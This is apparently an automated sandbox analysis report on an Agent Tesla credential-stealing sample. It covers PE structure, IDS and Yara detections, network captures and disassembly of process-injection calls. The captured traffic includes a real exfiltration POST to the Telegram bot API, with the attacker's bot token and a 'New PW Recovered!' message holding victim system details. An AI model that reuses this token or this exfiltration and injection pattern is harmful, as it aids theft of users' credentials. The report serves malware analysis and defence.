                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb6b2d0x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x1110.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb57180x54.text
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000xb4b880xb4c00False0.9270590205739973data7.873571070736306IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xb80000x11100x1200False0.73046875data6.631938259113971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xba0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0xb81000xa79PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                            RT_GROUP_ICON0xb8b8c0x14data
                                                                                            RT_VERSION0xb8bb00x360data
                                                                                            RT_MANIFEST0xb8f200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                            Imports

                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            192.168.2.6149.154.167.220497084432851779 03/20/23-18:29:57.946141TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49708443192.168.2.6149.154.167.220

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 20, 2023 18:29:44.434194088 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:44.434241056 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:44.434357882 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:44.462390900 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:44.462405920 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:45.065954924 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:45.066037893 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:45.093189001 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:45.093211889 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:45.093696117 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:45.139694929 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:45.335325003 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:45.335367918 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:46.803993940 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:46.851273060 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:46.976540089 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:46.976711988 CET4434970764.185.227.155192.168.2.6
                                                                                            Mar 20, 2023 18:29:46.976937056 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:46.977456093 CET49707443192.168.2.664.185.227.155
                                                                                            Mar 20, 2023 18:29:57.801019907 CET49708443192.168.2.6149.154.167.220
                                                                                            Mar 20, 2023 18:29:57.801071882 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:57.801156998 CET49708443192.168.2.6149.154.167.220
                                                                                            Mar 20, 2023 18:29:57.801922083 CET49708443192.168.2.6149.154.167.220
                                                                                            Mar 20, 2023 18:29:57.801939964 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:57.875756979 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:57.875921011 CET49708443192.168.2.6149.154.167.220
                                                                                            Mar 20, 2023 18:29:57.882587910 CET49708443192.168.2.6149.154.167.220
                                                                                            Mar 20, 2023 18:29:57.882610083 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:57.882960081 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:57.885320902 CET49708443192.168.2.6149.154.167.220
                                                                                            Mar 20, 2023 18:29:57.885354996 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:57.927625895 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:57.945914030 CET49708443192.168.2.6149.154.167.220
                                                                                            Mar 20, 2023 18:29:57.945959091 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:58.040643930 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:58.040755987 CET44349708149.154.167.220192.168.2.6
                                                                                            Mar 20, 2023 18:29:58.040847063 CET49708443192.168.2.6149.154.167.220
                                                                                            Mar 20, 2023 18:29:58.041444063 CET49708443192.168.2.6149.154.167.220

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 20, 2023 18:29:44.350991011 CET5859553192.168.2.68.8.8.8
                                                                                            Mar 20, 2023 18:29:44.371252060 CET53585958.8.8.8192.168.2.6
                                                                                            Mar 20, 2023 18:29:44.389094114 CET5633153192.168.2.68.8.8.8
                                                                                            Mar 20, 2023 18:29:44.408740997 CET53563318.8.8.8192.168.2.6
                                                                                            Mar 20, 2023 18:29:57.782294989 CET5050653192.168.2.68.8.8.8
                                                                                            Mar 20, 2023 18:29:57.799567938 CET53505068.8.8.8192.168.2.6

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Mar 20, 2023 18:29:44.350991011 CET192.168.2.68.8.8.80x3f2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:44.389094114 CET192.168.2.68.8.8.80xb099Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:57.782294989 CET192.168.2.68.8.8.80x5711Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Mar 20, 2023 18:29:44.371252060 CET8.8.8.8192.168.2.60x3f2No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:44.371252060 CET8.8.8.8192.168.2.60x3f2No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:44.371252060 CET8.8.8.8192.168.2.60x3f2No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:44.371252060 CET8.8.8.8192.168.2.60x3f2No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:44.408740997 CET8.8.8.8192.168.2.60xb099No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:44.408740997 CET8.8.8.8192.168.2.60xb099No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:44.408740997 CET8.8.8.8192.168.2.60xb099No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:44.408740997 CET8.8.8.8192.168.2.60xb099No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 18:29:57.799567938 CET8.8.8.8192.168.2.60x5711No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • api.ipify.org
                                                                                            • api.telegram.org

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.64970764.185.227.155443C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2023-03-20 17:29:45 UTC0OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                            Host: api.ipify.org
                                                                                            Connection: Keep-Alive
                                                                                            2023-03-20 17:29:46 UTC0INHTTP/1.1 200 OK
                                                                                            Content-Length: 14
                                                                                            Content-Type: text/plain
                                                                                            Date: Mon, 20 Mar 2023 17:29:46 GMT
                                                                                            Vary: Origin
                                                                                            Connection: close
                                                                                            2023-03-20 17:29:46 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                            Data Ascii: 102.129.143.78


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.2.649708149.154.167.220443C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2023-03-20 17:29:57 UTC0OUTPOST /bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocument HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=---------------------------8db29711b5da886
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 981
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            2023-03-20 17:29:57 UTC0INHTTP/1.1 100 Continue
                                                                                            2023-03-20 17:29:57 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 31 62 35 64 61 38 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 37 33 37 36 33 38 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 31 62 35 64 61 38 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 31 38 3a 32 39 3a 35 36 0a 55 73 65 72
                                                                                            Data Ascii: -----------------------------8db29711b5da886Content-Disposition: form-data; name="chat_id"5737638148-----------------------------8db29711b5da886Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 18:29:56User
                                                                                            2023-03-20 17:29:58 UTC1INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Mon, 20 Mar 2023 17:29:58 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 730
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            {"ok":true,"result":{"message_id":1237,"from":{"id":5806691582,"is_bot":true,"first_name":"chezieee","username":"chiezieebot"},"chat":{"id":5737638148,"first_name":"Texas","last_name":"Off","type":"private"},"date":1679333397,"document":{"file_name":"user-648351 2023-03-20 18-29-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIE1WQYmBVT1P_M1pZqLVG40f5Xbtd0AAJ3DAACeCjIUOHWdj6yZrvqLwQ","file_unique_id":"AgADdwwAAngoyFA","file_size":352},"caption":"New PW Recovered!\n\nTime: 03/20/2023 18:29:56\nUser Name: user/648351\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":181,"length":14,"type":"url"}]}}


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:18:29:32
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            Imagebase:0xfe0000
                                                                                            File size:745984 bytes
                                                                                            MD5 hash:9B75823D12157891FAFE183679B54831
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:18:29:41
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            Imagebase:0x6d0000
                                                                                            File size:745984 bytes
                                                                                            MD5 hash:9B75823D12157891FAFE183679B54831
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.9%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:86
                                                                                              Total number of Limit Nodes:3
                                                                                              execution_graph 15660 7928b90 15661 7928bdb ReadProcessMemory 15660->15661 15663 7928c1f 15661->15663 15668 7928980 15669 79289c0 VirtualAllocEx 15668->15669 15671 79289fd 15669->15671 15700 7928a70 15701 7928ab8 WriteProcessMemory 15700->15701 15703 7928b0f 15701->15703 15672 59c0988 15676 59c09cc 15672->15676 15680 59c09d8 15672->15680 15677 59c0a40 CreateWindowExW 15676->15677 15679 59c0afc 15677->15679 15681 59c0a40 CreateWindowExW 15680->15681 15683 59c0afc 15681->15683 15683->15683 15708 164d01c 15709 164d034 15708->15709 15710 164d08e 15709->15710 15715 59c1888 15709->15715 15721 59c0b7f 15709->15721 15726 59c0b90 15709->15726 15731 59c1878 15709->15731 15716 59c18b5 15715->15716 15717 59c18e7 15716->15717 15737 59c1adc 15716->15737 15743 59c1a00 15716->15743 15748 59c1a10 15716->15748 15722 59c0bb6 15721->15722 15724 59c1888 2 API calls 15722->15724 15725 59c1878 2 API calls 15722->15725 15723 59c0bd7 15723->15710 15724->15723 15725->15723 15727 59c0bb6 15726->15727 15729 59c1888 2 API calls 15727->15729 15730 59c1878 2 API calls 15727->15730 15728 59c0bd7 15728->15710 15729->15728 15730->15728 15732 59c18b5 15731->15732 15733 59c18e7 15732->15733 15734 59c1adc 2 API calls 15732->15734 15735 59c1a10 2 API calls 15732->15735 15736 59c1a00 2 API calls 15732->15736 15734->15733 15735->15733 15736->15733 15738 59c1a9a 15737->15738 15739 59c1aea 15737->15739 15753 59c1ab8 15738->15753 15756 59c1ac8 15738->15756 15740 59c1ab0 15740->15717 15745 59c1a07 15743->15745 15744 59c1ab0 15744->15717 15746 59c1ab8 2 API calls 15745->15746 15747 59c1ac8 2 API calls 15745->15747 15746->15744 15747->15744 15750 59c1a24 15748->15750 15749 59c1ab0 15749->15717 15751 59c1ab8 2 API calls 15750->15751 15752 59c1ac8 2 API calls 15750->15752 15751->15749 15752->15749 15754 59c1ad9 15753->15754 15759 59c2f60 15753->15759 15754->15740 15757 59c1ad9 15756->15757 15758 59c2f60 2 API calls 15756->15758 15757->15740 15758->15757 15763 59c2f90 15759->15763 15767 59c2f80 15759->15767 15760 59c2f7a 15760->15754 15764 59c2fd9 15763->15764 15765 59c2fd2 15763->15765 15764->15760 15765->15764 15766 59c302a CallWindowProcW 15765->15766 15766->15764 15768 59c2fd2 15767->15768 15770 59c2fd9 15767->15770 15769 59c302a CallWindowProcW 15768->15769 15768->15770 15769->15770 15770->15760 15664 7928798 15665 79287dd SetThreadContext 15664->15665 15667 7928825 15665->15667 15684 7928d88 15685 7928e11 15684->15685 15685->15685 15686 7928f76 CreateProcessA 15685->15686 15687 7928fd3 15686->15687 15704 79286b8 15705 79286f8 ResumeThread 15704->15705 15707 7928729 15705->15707 15688 7db9300 15689 7db948b 15688->15689 15690 7db9326 15688->15690 15690->15689 15694 59c0c18 SetWindowLongW 15690->15694 15696 59c0c20 SetWindowLongW 15690->15696 15698 7db9580 PostMessageW 15690->15698 15695 59c0c8c 15694->15695 15695->15690 15697 59c0c8c 15696->15697 15697->15690 15699 7db95ec 15698->15699 15699->15690

                                                                                              Executed Functions

                                                                                              Function 07928D88 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1245 7928d88-7928e1d 1247 7928e56-7928e76 1245->1247 1248 7928e1f-7928e29 1245->1248 1255 7928e78-7928e82 1247->1255 1256 7928eaf-7928ede 1247->1256 1248->1247 1249 7928e2b-7928e2d 1248->1249 1250 7928e50-7928e53 1249->1250 1251 7928e2f-7928e39 1249->1251 1250->1247 1253 7928e3b 1251->1253 1254 7928e3d-7928e4c 1251->1254 1253->1254 1254->1254 1257 7928e4e 1254->1257 1255->1256 1258 7928e84-7928e86 1255->1258 1264 7928ee0-7928eea 1256->1264 1265 7928f17-7928fd1 CreateProcessA 1256->1265 1257->1250 1260 7928e88-7928e92 1258->1260 1261 7928ea9-7928eac 1258->1261 1262 7928e96-7928ea5 1260->1262 1263 7928e94 1260->1263 1261->1256 1262->1262 1266 7928ea7 1262->1266 1263->1262 1264->1265 1267 7928eec-7928eee 1264->1267 1276 7928fd3-7928fd9 1265->1276 1277 7928fda-7929060 1265->1277 1266->1261 1269 7928ef0-7928efa 1267->1269 1270 7928f11-7928f14 1267->1270 1271 7928efe-7928f0d 1269->1271 1272 7928efc 1269->1272 1270->1265 1271->1271 1274 7928f0f 1271->1274 1272->1271 1274->1270 1276->1277 1287 7929062-7929066 1277->1287 1288 7929070-7929074 1277->1288 1287->1288 1289 7929068 1287->1289 1290 7929076-792907a 1288->1290 1291 7929084-7929088 1288->1291 1289->1288 1290->1291 1294 792907c 1290->1294 1292 792908a-792908e 1291->1292 1293 7929098-792909c 1291->1293 1292->1293 1295 7929090 1292->1295 1296 79290ae-79290b5 1293->1296 1297 792909e-79290a4 1293->1297 1294->1291 1295->1293 1298 79290b7-79290c6 1296->1298 1299 79290cc 1296->1299 1297->1296 1298->1299
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07928FBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 4527d7d2e678824d6312018943205f94bd809a73120527d44b71d938dc105e66
                                                                                              • Instruction ID: 0e18e82524648e35a16d1ffeaf8de7f9e2a5d55bc83096310de61cdbae13d693
                                                                                              • Opcode Fuzzy Hash: 4527d7d2e678824d6312018943205f94bd809a73120527d44b71d938dc105e66
                                                                                              • Instruction Fuzzy Hash: 05916DB1D0022ADFDF10EFA9C841BEDBBB6BB44314F048569E809B7244DB749986DF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 059C09CC Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1301 59c09cc-59c0a3e 1302 59c0a49-59c0a50 1301->1302 1303 59c0a40-59c0a46 1301->1303 1304 59c0a5b-59c0afa CreateWindowExW 1302->1304 1305 59c0a52-59c0a58 1302->1305 1303->1302 1307 59c0afc-59c0b02 1304->1307 1308 59c0b03-59c0b3b 1304->1308 1305->1304 1307->1308 1312 59c0b3d-59c0b40 1308->1312 1313 59c0b48 1308->1313 1312->1313 1314 59c0b49 1313->1314 1314->1314
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059C0AEA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: ac0d1e8ecc244d76d67560a1f02b1836b9c122bbf4f972b49223718316f40425
                                                                                              • Instruction ID: 1d1f5fd59a7736a487c1d076226fa2c1fd1dbfe62b57bc669591535f20fd611a
                                                                                              • Opcode Fuzzy Hash: ac0d1e8ecc244d76d67560a1f02b1836b9c122bbf4f972b49223718316f40425
                                                                                              • Instruction Fuzzy Hash: 1151BCB1D00309DFDF14CFAAC984ADEBBB5BF48314F24812AE819AB210D7749985CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 059C09D8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1315 59c09d8-59c0a3e 1316 59c0a49-59c0a50 1315->1316 1317 59c0a40-59c0a46 1315->1317 1318 59c0a5b-59c0afa CreateWindowExW 1316->1318 1319 59c0a52-59c0a58 1316->1319 1317->1316 1321 59c0afc-59c0b02 1318->1321 1322 59c0b03-59c0b3b 1318->1322 1319->1318 1321->1322 1326 59c0b3d-59c0b40 1322->1326 1327 59c0b48 1322->1327 1326->1327 1328 59c0b49 1327->1328 1328->1328
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059C0AEA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 919580c79e2c071f5a1c5ad661b536e0c324c8b99d9c8b6ab3595acc0a4a52a8
                                                                                              • Instruction ID: d6558f1dd48a7f75115c88bbe9897027e02d6941ed59107f6d5987a2750be380
                                                                                              • Opcode Fuzzy Hash: 919580c79e2c071f5a1c5ad661b536e0c324c8b99d9c8b6ab3595acc0a4a52a8
                                                                                              • Instruction Fuzzy Hash: 5C418DB1D00209DFDF14CF9AD884ADEBFB5BF48314F24856AE819AB210D7749985CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 059C2F90 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1329 59c2f90-59c2fcc 1330 59c307c-59c309c 1329->1330 1331 59c2fd2-59c2fd7 1329->1331 1337 59c309f-59c30ac 1330->1337 1332 59c2fd9-59c3010 1331->1332 1333 59c302a-59c3062 CallWindowProcW 1331->1333 1340 59c3019-59c3028 1332->1340 1341 59c3012-59c3018 1332->1341 1334 59c306b-59c307a 1333->1334 1335 59c3064-59c306a 1333->1335 1334->1337 1335->1334 1340->1337 1341->1340
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 059C3051
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 2bacfdeb750840e17f623ca96c75f73ba629f13f64875f62667a14a5020e721f
                                                                                              • Instruction ID: ef002f34fd9a58405e4c296b742bb3ebc17b23cd8307244da297ded9276cb52b
                                                                                              • Opcode Fuzzy Hash: 2bacfdeb750840e17f623ca96c75f73ba629f13f64875f62667a14a5020e721f
                                                                                              • Instruction Fuzzy Hash: EE410BB5900305DFCB14CF99C448AAABBF5FB88314F25C89DD519AB321D775A841CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07928A70 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1343 7928a70-7928abe 1345 7928ac0-7928acc 1343->1345 1346 7928ace-7928b0d WriteProcessMemory 1343->1346 1345->1346 1348 7928b16-7928b46 1346->1348 1349 7928b0f-7928b15 1346->1349 1349->1348
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07928B00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
